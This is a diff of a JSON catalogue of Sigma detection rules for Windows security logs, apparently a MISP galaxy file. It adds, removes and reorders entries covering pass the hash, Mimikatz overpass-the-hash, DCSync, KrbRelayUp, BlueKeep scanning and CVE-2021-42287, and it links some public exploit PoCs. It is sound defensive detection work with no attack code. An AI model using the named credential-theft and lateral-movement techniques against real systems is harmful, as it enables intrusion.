- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_scrcons_remote_wmi_scripteventconsumer.yml"
- ],
- "tags": [
- "attack.lateral_movement",
- "attack.privilege_escalation",
- "attack.persistence",
- "attack.t1546.003"
- ]
- },
- "related": [
- {
- "dest-uuid": "910906dd-8c0a-475a-9cc1-5e029e2fad58",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "9599c180-e3a8-4743-8f92-7fb96d3be648",
- "value": "Remote WMI ActiveScriptEventConsumers"
- },
{
"description": "Detects scenarios where an windows defender exclusion was added in registry where an entity would want to bypass antivirus scanning from windows defender",
"meta": {
@@ -8238,9 +7706,9 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
+ "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md",
"https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4741",
"https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4743",
- "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_add_remove_computer.yml"
],
"tags": "No established tags"
@@ -8388,41 +7856,6 @@
"uuid": "2a926e6a-4b81-4011-8a96-e36cc8c04302",
"value": "PowerShell Scripts Installed as Services - Security"
},
- {
- "description": "Detects the use of a scanner by zerosum0x0 that discovers targets vulnerable to CVE-2019-0708 RDP RCE aka BlueKeep",
- "meta": {
- "author": "Florian Roth (Nextron Systems), Adam Bradbury (idea)",
- "creation_date": "2019/06/02",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "win_security_rdp_bluekeep_poc_scanner.yml",
- "level": "high",
- "logsource.category": "No established category",
- "logsource.product": "windows",
- "refs": [
- "https://github.com/zerosum0x0/CVE-2019-0708",
- "https://twitter.com/AdamTheAnalyst/status/1134394070045003776",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_rdp_bluekeep_poc_scanner.yml"
- ],
- "tags": [
- "attack.lateral_movement",
- "attack.t1210",
- "car.2013-07-002"
- ]
- },
- "related": [
- {
- "dest-uuid": "9db0cf3a-a3c9-4012-8268-123b9db6fd82",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "8400629e-79a9-4737-b387-5db940ab2367",
- "value": "Scanner PoC for CVE-2019-0708 RDP RCE Vuln"
- },
{
"description": "This event is generated when an authenticated user who is not allowed to log on remotely attempts to connect to this computer through Remote Desktop.\nOften, this event can be generated by attackers when searching for available windows servers in the network.\n",
"meta": {
@@ -8577,9 +8010,9 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
+ "https://threathunterplaybook.com/hunts/windows/180815-ADObjectAccessReplication/notebook.html",
"https://threathunterplaybook.com/library/windows/active_directory_replication.html",
"https://threathunterplaybook.com/hunts/windows/190101-ADModDirectoryReplication/notebook.html",
- "https://threathunterplaybook.com/hunts/windows/180815-ADObjectAccessReplication/notebook.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_ad_replication_non_machine_account.yml"
],
"tags": [
@@ -8633,10 +8066,10 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4800",
- "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf",
"https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf",
+ "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf",
"https://www.cisecurity.org/controls/cis-controls-list/",
+ "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4800",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_workstation_was_locked.yml"
],
"tags": "No established tags"
@@ -8657,16 +8090,16 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "http://managed670.rssing.com/chan-5590147/all_p1.html",
- "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables",
- "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_",
- "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf",
"https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38",
+ "https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf",
+ "https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables",
+ "http://managed670.rssing.com/chan-5590147/all_p1.html",
+ "https://twitter.com/_xpn_/status/1268712093928378368",
+ "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39",
"https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr",
"https://bunnyinside.com/?term=f71e8cb9c76a",
"https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code",
- "https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39",
- "https://twitter.com/_xpn_/status/1268712093928378368",
+ "https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dot_net_etw_tamper.yml"
],
"tags": [
@@ -8870,8 +8303,8 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://o365blog.com/post/hybridhealthagent/",
"https://github.com/OTRF/Set-AuditRule/blob/c3dec5443414231714d850565d364ca73475ade5/rules/registry/aad_connect_health_service_agent.yml",
+ "https://o365blog.com/post/hybridhealthagent/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_aadhealth_svc_agent_regkey_access.yml"
],
"tags": [
@@ -8891,57 +8324,6 @@
"uuid": "1d2ab8ac-1a01-423b-9c39-001510eae8e8",
"value": "Azure AD Health Service Agents Registry Keys Access"
},
- {
- "description": "Detects successful logon from public IP address via RDP. This can indicate a publicly-exposed RDP port.",
- "meta": {
- "author": "Micah Babinski (@micahbabinski), Zach Mathis (@yamatosecurity)",
- "creation_date": "2023/01/19",
- "falsepositive": [
- "Legitimate or intentional inbound connections from public IP addresses on the RDP port."
- ],
- "filename": "win_security_successful_external_remote_rdp_login.yml",
- "level": "medium",
- "logsource.category": "No established category",
- "logsource.product": "windows",
- "refs": [
- "https://www.inversecos.com/2020/04/successful-4624-anonymous-logons-to.html",
- "https://twitter.com/Purp1eW0lf/status/1616144561965002752",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_successful_external_remote_rdp_login.yml"
- ],
- "tags": [
- "attack.initial_access",
- "attack.credential_access",
- "attack.t1133",
- "attack.t1078",
- "attack.t1110"
- ]
- },
- "related": [
- {
- "dest-uuid": "10d51417-ee35-4589-b1ff-b6df1c334e8d",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "259a9cdf-c4dd-4fa2-b243-2269e5ab18a2",
- "value": "External Remote RDP Logon from Public IP"
- },
{
"description": "Detects process handle on LSASS process with certain access mask and object type SAM_DOMAIN",
"meta": {
@@ -8988,8 +8370,8 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/",
"https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens",
+ "https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_teams_suspicious_objectaccess.yml"
],
"tags": [
@@ -9022,8 +8404,8 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://adsecurity.org/?p=2053",
"https://www.harmj0y.net/blog/activedirectory/roasting-as-reps/",
+ "https://adsecurity.org/?p=2053",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_enable_weak_encryption.yml"
],
"tags": [
@@ -9151,8 +8533,8 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://securitydatasets.com/notebooks/small/windows/08_lateral_movement/SDWIN-200806015757.html?highlight=create%20file",
"https://github.com/OTRF/ThreatHunter-Playbook/blob/f7a58156dbfc9b019f17f638b8c62d22e557d350/playbooks/WIN-201012004336.yaml",
+ "https://securitydatasets.com/notebooks/small/windows/08_lateral_movement/SDWIN-200806015757.html?highlight=create%20file",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_smb_file_creation_admin_shares.yml"
],
"tags": [
@@ -9185,8 +8567,8 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/duzvik/status/1269671601852813320",
"https://medium.com/@7a616368/can-you-track-processes-accessing-the-camera-and-microphone-7e6885b37072",
+ "https://twitter.com/duzvik/status/1269671601852813320",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_camera_microphone_access.yml"
],
"tags": [
@@ -9219,8 +8601,8 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://github.com/splunk/security_content/blob/0dd6de32de2118b2818550df9e65255f4109a56d/detections/endpoint/petitpotam_network_share_access_request.yml",
"https://github.com/topotam/PetitPotam",
+ "https://github.com/splunk/security_content/blob/0dd6de32de2118b2818550df9e65255f4109a56d/detections/endpoint/petitpotam_network_share_access_request.yml",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_petitpotam_network_share.yml"
],
"tags": [
@@ -9286,9 +8668,9 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
+ "http://www.stuffithoughtiknew.com/2019/02/detecting-bloodhound.html",
"https://www.specterops.io/assets/resources/an_ace_up_the_sleeve.pdf",
"https://docs.microsoft.com/en-us/windows/win32/adschema/attributes-all",
- "http://www.stuffithoughtiknew.com/2019/02/detecting-bloodhound.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_ad_user_enumeration.yml"
],
"tags": [
@@ -9321,9 +8703,9 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
+ "https://adsecurity.org/?p=3466",
"https://www.harmj0y.net/blog/redteaming/another-word-on-delegation/",
"https://msdn.microsoft.com/en-us/library/cc220234.aspx",
- "https://adsecurity.org/?p=3466",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_ad_user_backdoors.yml"
],
"tags": [
@@ -9343,40 +8725,6 @@
"uuid": "300bac00-e041-4ee2-9c36-e262656a6ecc",
"value": "Active Directory User Backdoors"
},
- {
- "description": "Detects successful logon with logon type 9 (NewCredentials) which matches the Overpass the Hash behavior of e.g Mimikatz's sekurlsa::pth module.",
- "meta": {
- "author": "Roberto Rodriguez (source), Dominik Schaudel (rule)",
- "creation_date": "2018/02/12",
- "falsepositive": [
- "Runas command-line tool using /netonly parameter"
- ],
- "filename": "win_security_overpass_the_hash.yml",
- "level": "high",
- "logsource.category": "No established category",
- "logsource.product": "windows",
- "refs": [
- "https://cyberwardog.blogspot.de/2017/04/chronicles-of-threat-hunter-hunting-for.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_overpass_the_hash.yml"
- ],
- "tags": [
- "attack.lateral_movement",
- "attack.s0002",
- "attack.t1550.002"
- ]
- },
- "related": [
- {
- "dest-uuid": "e624264c-033a-424d-9fd7-fc9c3bbdb03e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "192a0330-c20b-4356-90b6-7b7049ae0b87",
- "value": "Successful Overpass the Hash Attempt"
- },
{
"description": "Detects possible addition of shadow credentials to an active directory object.",
"meta": {
@@ -9425,8 +8773,8 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://www.jpcert.or.jp/english/pub/sr/ir_research.html",
"https://jpcertcc.github.io/ToolAnalysisResultSheet",
+ "https://www.jpcert.or.jp/english/pub/sr/ir_research.html",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_mal_wceaux_dll.yml"
],
"tags": [
@@ -9461,8 +8809,8 @@
"logsource.product": "windows",
"refs": [
"https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/",
- "https://www.sans.org/webcasts/119395",
"https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/",
+ "https://www.sans.org/webcasts/119395",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_cobaltstrike_service_installs.yml"
],
"tags": [
@@ -9500,27 +8848,6 @@
"uuid": "d7a95147-145f-4678-b85d-d1ff4a3bb3f6",
"value": "CobaltStrike Service Installations - Security"
},
- {
- "description": "Detects the renaming of an existing computer account to a account name that doesn't contain a $ symbol as seen in attacks against CVE-2021-42287",
- "meta": {
- "author": "Florian Roth (Nextron Systems)",
- "creation_date": "2021/12/22",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "win_security_samaccountname_spoofing_cve_2021_42287.yml",
- "level": "high",
- "logsource.category": "No established category",
- "logsource.product": "windows",
- "refs": [
- "https://medium.com/@mvelazco/hunting-for-samaccountname-spoofing-cve-2021-42287-and-domain-controller-impersonation-f704513c8a45",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_samaccountname_spoofing_cve_2021_42287.yml"
- ],
- "tags": "No established tags"
- },
- "uuid": "45eb2ae2-9aa2-4c3a-99a5-6e5077655466",
- "value": "Suspicious Computer Account Name Change CVE-2021-42287"
- },
{
"description": "Addition of domains is seldom and should be verified for legitimacy.",
"meta": {
@@ -9567,10 +8894,10 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
+ "https://blog.blacklanternsecurity.com/p/detecting-dcsync?s=r",
+ "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4662",
"https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2",
"https://twitter.com/gentilkiwi/status/1003236624925413376",
- "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4662",
- "https://blog.blacklanternsecurity.com/p/detecting-dcsync?s=r",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dcsync.yml"
],
"tags": [
@@ -9708,8 +9035,8 @@
"logsource.category": "No established category",
"logsource.product": "windows",
"refs": [
- "https://twitter.com/malmoeb/status/1511760068743766026",
"https://github.com/WazeHell/sam-theadmin/blob/main/sam_the_admin.py",
+ "https://twitter.com/malmoeb/status/1511760068743766026",
"https://github.com/helloexp/0day/blob/614227a7b9beb0e91e7e2c6a5e532e6f7a8e883c/00-CVE_EXP/CVE-2021-42287/sam-the-admin/sam_the_admin.py",
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_computer_name.yml"
],
@@ -9768,152 +9095,6 @@
"uuid": "614cf376-6651-47c4-9dcc-6b9527f749f4",
"value": "Suspicious Scheduled Task Update"
},
- {
- "description": "Detect remote login by Administrator user (depending on internal pattern).",
- "meta": {
- "author": "juju4",
- "creation_date": "2017/10/29",
- "falsepositive": [
- "Legitimate administrative activity."
- ],
- "filename": "win_security_admin_rdp_login.yml",
- "level": "low",
- "logsource.category": "No established category",
- "logsource.product": "windows",
- "refs": [
- "https://car.mitre.org/wiki/CAR-2016-04-005",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_admin_rdp_login.yml"
- ],
- "tags": [
- "attack.lateral_movement",
- "attack.t1078.001",
- "attack.t1078.002",
- "attack.t1078.003",
- "car.2016-04-005"
- ]
- },
- "related": [
- {
- "dest-uuid": "6151cbea-819b-455a-9fa6-99a1cc58797d",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "fdc47f44-dd32-4b99-af5f-209f556f63c2",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "0f63e1ef-1eb9-4226-9d54-8927ca08520a",
- "value": "Admin User Remote Logon"
- },
- {
- "description": "Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report",
- "meta": {
- "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community",
- "creation_date": "2018/03/23",
- "falsepositive": [
- "Unlikely"
- ],
- "filename": "win_security_apt_oilrig_mar18.yml",
- "level": "critical",
- "logsource.category": "No established category",
- "logsource.product": "windows",
- "refs": [
- "https://web.archive.org/web/20180402134442/https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018C.pdf",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_apt_oilrig_mar18.yml"
- ],
- "tags": [
- "attack.persistence",
- "attack.g0049",
- "attack.t1053.005",
- "attack.s0111",
- "attack.t1543.003",
- "attack.defense_evasion",
- "attack.t1112",
- "attack.command_and_control",
- "attack.t1071.004"
- ]
- },
- "related": [
- {
- "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- },
- {
- "dest-uuid": "1996eef1-ced3-4d7f-bf94-33298cabbf72",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "c0580559-a6bd-4ef6-b9b7-83703d98b561",
- "value": "OilRig APT Schedule Task Persistence - Security"
- },
- {
- "description": "Detects remote printer driver load from Detailed File Share in Security logs that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 and CVE-2021-34527",
- "meta": {
- "author": "INIT_6",
- "creation_date": "2021/07/02",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "win_security_exploit_cve_2021_1675_printspooler_security.yml",
- "level": "critical",
- "logsource.category": "No established category",
- "logsource.product": "windows",
- "refs": [
- "https://twitter.com/INIT_3/status/1410662463641731075",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_exploit_cve_2021_1675_printspooler_security.yml"
- ],
- "tags": [
- "attack.execution",
- "attack.t1569",
- "cve.2021.1675",
- "cve.2021.34527"
- ]
- },
- "related": [
- {
- "dest-uuid": "d157f9d2-d09a-4efa-bb2a-64963f94e253",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "related-to"
- }
- ],
- "uuid": "8fe1c584-ee61-444b-be21-e9054b229694",
- "value": "CVE-2021-1675 Print Spooler Exploitation IPC Access"
- },
{
"description": "Detects a threat actor creating a file named `iertutil.dll` in the `C:\\Program Files\\Internet Explorer\\` directory over the network for a DCOM InternetExplorer DLL Hijack scenario.",
"meta": {
@@ -9955,6 +9136,627 @@
"uuid": "c39f0c81-7348-4965-ab27-2fde35a1b641",
"value": "DCOM InternetExplorer.Application Iertutil DLL Hijack - Security"
},
+ {
+ "description": "Detects the default \"UserName\" used by the DiagTrackEoP POC",
+ "meta": {
+ "author": "Nasreddine Bencherchali (Nextron Systems)",
+ "creation_date": "2022/08/03",
+ "falsepositive": [
+ "Unlikely"
+ ],
+ "filename": "win_security_diagtrack_eop_default_login_username.yml",
+ "level": "critical",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/Wh04m1001/DiagTrackEoP/blob/3a2fc99c9700623eb7dc7d4b5f314fd9ce5ef51f/main.cpp#L46",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_diagtrack_eop_default_login_username.yml"
+ ],
+ "tags": [
+ "attack.privilege_escalation"
+ ]
+ },
+ "uuid": "2111118f-7e46-4fc8-974a-59fd8ec95196",
+ "value": "DiagTrackEoP Default Login Username"
+ },
+ {
+ "description": "Detects the attack technique pass the hash which is used to move laterally inside the network",
+ "meta": {
+ "author": "Dave Kennedy, Jeff Warren (method) / David Vassallo (rule)",
+ "creation_date": "2019/06/14",
+ "falsepositive": [
+ "Administrator activity"
+ ],
+ "filename": "win_security_pass_the_hash_2.yml",
+ "level": "medium",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://blog.stealthbits.com/how-to-detect-pass-the-hash-attacks/",
+ "https://github.com/iadgov/Event-Forwarding-Guidance/tree/master/Events",
+ "https://blog.binarydefense.com/reliably-detecting-pass-the-hash-through-event-log-analysis",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_pass_the_hash_2.yml"
+ ],
+ "tags": [
+ "attack.lateral_movement",
+ "attack.t1550.002"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "e624264c-033a-424d-9fd7-fc9c3bbdb03e",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "8eef149c-bd26-49f2-9e5a-9b00e3af499b",
+ "value": "Pass the Hash Activity 2"
+ },
+ {
+ "description": "Detects logon events that specify new credentials",
+ "meta": {
+ "author": "Max Altgelt (Nextron Systems)",
+ "creation_date": "2022/04/06",
+ "falsepositive": [
+ "Legitimate remote administration activity"
+ ],
+ "filename": "win_security_susp_logon_newcredentials.yml",
+ "level": "low",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://go.recordedfuture.com/hubfs/reports/mtp-2021-0914.pdf",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_susp_logon_newcredentials.yml"
+ ],
+ "tags": "No established tags"
+ },
+ "uuid": "def8b624-e08f-4ae1-8612-1ba21190da6b",
+ "value": "Outgoing Logon with New Credentials"
+ },
+ {
+ "description": "Detects logon events that have characteristics of events generated during an attack with KrbRelayUp and the like",
+ "meta": {
+ "author": "@SBousseaden, Florian Roth",
+ "creation_date": "2022/04/27",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "win_security_susp_krbrelayup.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://twitter.com/sbousseaden/status/1518976397364056071?s=12&t=qKO5eKHvWhAP19a50FTZ7g",
+ "https://github.com/elastic/detection-rules/blob/fb6ee2c69864ffdfe347bf3b050cb931f53067a6/rules/windows/privilege_escalation_krbrelayup_suspicious_logon.toml",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_susp_krbrelayup.yml"
+ ],
+ "tags": [
+ "attack.privilege_escalation",
+ "attack.credential_access"
+ ]
+ },
+ "uuid": "749c9f5e-b353-4b90-a9c1-05243357ca4b",
+ "value": "KrbRelayUp Attack Pattern"
+ },
+ {
+ "description": "Detects successful logon from public IP address via SMB. This can indicate a publicly-exposed SMB port.",
+ "meta": {
+ "author": "Micah Babinski (@micahbabinski), Zach Mathis (@yamatosecurity)",
+ "creation_date": "2023/01/19",
+ "falsepositive": [
+ "Legitimate or intentional inbound connections from public IP addresses on the SMB port."
+ ],
+ "filename": "win_security_successful_external_remote_smb_login.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.inversecos.com/2020/04/successful-4624-anonymous-logons-to.html",
+ "https://twitter.com/Purp1eW0lf/status/1616144561965002752",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_successful_external_remote_smb_login.yml"
+ ],
+ "tags": [
+ "attack.initial_access",
+ "attack.credential_access",
+ "attack.t1133",
+ "attack.t1078",
+ "attack.t1110"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "10d51417-ee35-4589-b1ff-b6df1c334e8d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "78d5cab4-557e-454f-9fb9-a222bd0d5edc",
+ "value": "External Remote SMB Logon from Public IP"
+ },
+ {
+ "description": "A login from a public IP can indicate a misconfigured firewall or network boundary.",
+ "meta": {
+ "author": "NVISO",
+ "creation_date": "2020/05/06",
+ "falsepositive": [
+ "Legitimate logon attempts over the internet",
+ "IPv4-to-IPv6 mapped IPs"
+ ],
+ "filename": "win_security_susp_failed_logon_source.yml",
+ "level": "medium",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_susp_failed_logon_source.yml"
+ ],
+ "tags": [
+ "attack.initial_access",
+ "attack.persistence",
+ "attack.t1078",
+ "attack.t1190",
+ "attack.t1133"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "10d51417-ee35-4589-b1ff-b6df1c334e8d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "f88e112a-21aa-44bd-9b01-6ee2a2bbbed1",
+ "value": "Failed Logon From Public IP"
+ },
+ {
+ "description": "RDP login with localhost source address may be a tunnelled login",
+ "meta": {
+ "author": "Thomas Patzke",
+ "creation_date": "2019/01/28",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "win_security_rdp_localhost_login.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_rdp_localhost_login.yml"
+ ],
+ "tags": [
+ "attack.lateral_movement",
+ "car.2013-07-002",
+ "attack.t1021.001"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "eb062747-2193-45de-8fa2-e62549c37ddf",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "51e33403-2a37-4d66-a574-1fda1782cc31",
+ "value": "RDP Login from Localhost"
+ },
+ {
+ "description": "Detects activity when a security-enabled global group is deleted",
+ "meta": {
+ "author": "Alexandr Yampolskyi, SOC Prime",
+ "creation_date": "2023/04/26",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "win_security_security_enabled_global_group_deleted.yml",
+ "level": "low",
+ "logsource.category": "No established category",
+ "logsource.product": "windows",
+ "refs": [
+ "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf",
+ "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=634",
+ "https://www.cisecurity.org/controls/cis-controls-list/",
+ "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf",
+ "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4730",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/account_management/win_security_security_enabled_global_group_deleted.yml"
+ ],
+ "tags": "No established tags"
+ },
